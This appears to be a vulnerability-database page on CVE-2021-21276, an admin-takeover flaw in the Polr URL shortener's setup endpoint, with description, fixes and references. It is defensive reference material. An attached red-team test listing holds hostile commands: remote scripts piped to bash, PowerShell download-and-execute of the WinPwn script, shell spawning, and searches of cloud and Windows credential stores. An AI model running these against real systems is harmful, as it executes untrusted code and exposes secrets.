CVE-2021-21276
Overview
This vulnerability is an authentication bypass caused by a loose comparison operator in the setup process of the Polr URL shortener. Specifically, the SetupController uses a non-strict equality check (==) to validate the setup key, allowing crafted cookie headers to bypass intended verification. The affected component is the /setup/finish endpoint responsible for finalizing site setup and provisioning administrative accounts.
Vulnerability Description
Polr is an open source URL shortener. in Polr before version 2.3.0, a vulnerability in the setup process allows attackers to gain admin access to site instances, even if they do not possess an existing account. This vulnerability exists regardless of users' settings. If an attacker crafts a request with specific cookie headers to the /setup/finish endpoint, they may be able to obtain admin privileges on the instance. This is caused by a loose comparison (==) in SetupController that is susceptible to attack. The project has been patched to ensure that a strict comparison (===) is used to verify the setup key, and that /setup/finish verifies that no users table exists before performing any migrations or provisioning any new accounts. This is fixed in version 2.3.0. Users can patch this vulnerability without upgrading by adding abort(404) to the very first line of finishSetup in SetupController.php.
Impact
An unauthenticated attacker with network access to the Polr instance can exploit this vulnerability to gain administrative privileges without any existing account. This enables full control over the affected instance, including potential data manipulation or configuration changes. The attack requires no user interaction and leverages the setup endpoint's flawed validation logic, as reflected in the CVSS vector indicating no privileges or user interaction are required (AV:N/AC:L/PR:N/UI:N).
Solution
Users should upgrade Polr to version 2.3.0 or later, which includes a fix that replaces the loose comparison with a strict equality check and adds verification of the users table before setup completion. As an interim workaround, administrators can modify SetupController.php by adding abort(404) at the start of the finishSetup function to block exploitation attempts. Detailed patch and advisory information is available at https://github.com/cydrobolt/polr/security/advisories/GHSA-vg6w-8w9v-xxqc.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the open-source URL shortener Polr is rooted in a flaw within the setup process, specifically in the way the application handles user authentication during the initial configuration. The issue arises from a loose comparison operator used in the SetupController, which allows an attacker to bypass authentication mechanisms by crafting a request with specific cookie headers directed at the /setup/finish endpoint. This vulnerability enables unauthorized users to gain administrative access to the Polr instance, irrespective of whether they have a legitimate account. The lack of stringent validation checks during the setup phase poses a significant security risk, as it allows attackers to manipulate the setup process and gain control over the application.
Exploitation of this vulnerability can occur through several attack vectors. An attacker could initiate the setup process and then send a specially crafted request to the vulnerable endpoint, leveraging the loose comparison to gain admin privileges. This scenario is particularly concerning as it does not require any prior access to the system or knowledge of valid credentials. Once an attacker successfully exploits this vulnerability, they can perform a range of malicious activities, including altering URL mappings, accessing sensitive data, or even compromising the entire application environment. The ease of exploitation, combined with the potential for significant impact, underscores the critical nature of this vulnerability.
The real-world implications of this vulnerability are profound, particularly for organizations that rely on Polr for URL shortening services. Unauthorized administrative access can lead to data breaches, service disruptions, and reputational damage. For businesses that utilize Polr to manage marketing campaigns or track user engagement through shortened URLs, the consequences of an attack could result in the loss of customer trust and potential legal ramifications. Additionally, the high CVSS score of 9.3 indicates that this vulnerability poses a severe risk, emphasizing the need for immediate attention and remediation to protect sensitive information and maintain operational integrity.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and vulnerability assessments can help identify instances of the affected software version in use. Organizations should prioritize upgrading to the patched version, 2.3.0, which rectifies the vulnerability by enforcing strict comparison checks and ensuring that the setup process is only executed when no user accounts exist. For those unable to upgrade immediately, a temporary mitigation strategy involves modifying the SetupController.php file to include an abort command at the beginning of the finishSetup function, effectively blocking unauthorized access until a full upgrade can be performed.
In conclusion, the vulnerability present in Polr's setup process highlights the importance of secure coding practices and rigorous validation mechanisms in software development. The potential for unauthorized administrative access poses significant risks to organizations utilizing this URL shortener, necessitating prompt action to mitigate the threat. By adopting proactive detection and remediation strategies, businesses can safeguard their applications against exploitation and maintain the integrity of their digital assets.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Polrproject | Polr | All |
cpe:2.3:a:polrproject:polr:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| POLR URL 2.3.0 - Shortener Admin Takeover | p4kl0nc4t | webapps | php | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-21276 |
| github.com |
GitHub CVE
|
https://github.com/cydrobolt/polr/security/advisories/GHSA-vg6w-8w9v-xxqc |
| github.com |
GitHub CVE
|
https://github.com/cydrobolt/polr/commit/b1981709908caf6069b4a29dad3b6739c322c675 |
| github.com |
GitHub CVE
|
https://github.com/cydrobolt/polr/releases/tag/2.3.0 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171743/POLR-URL-2.3.0-Shortener-Admin-Takeover.html |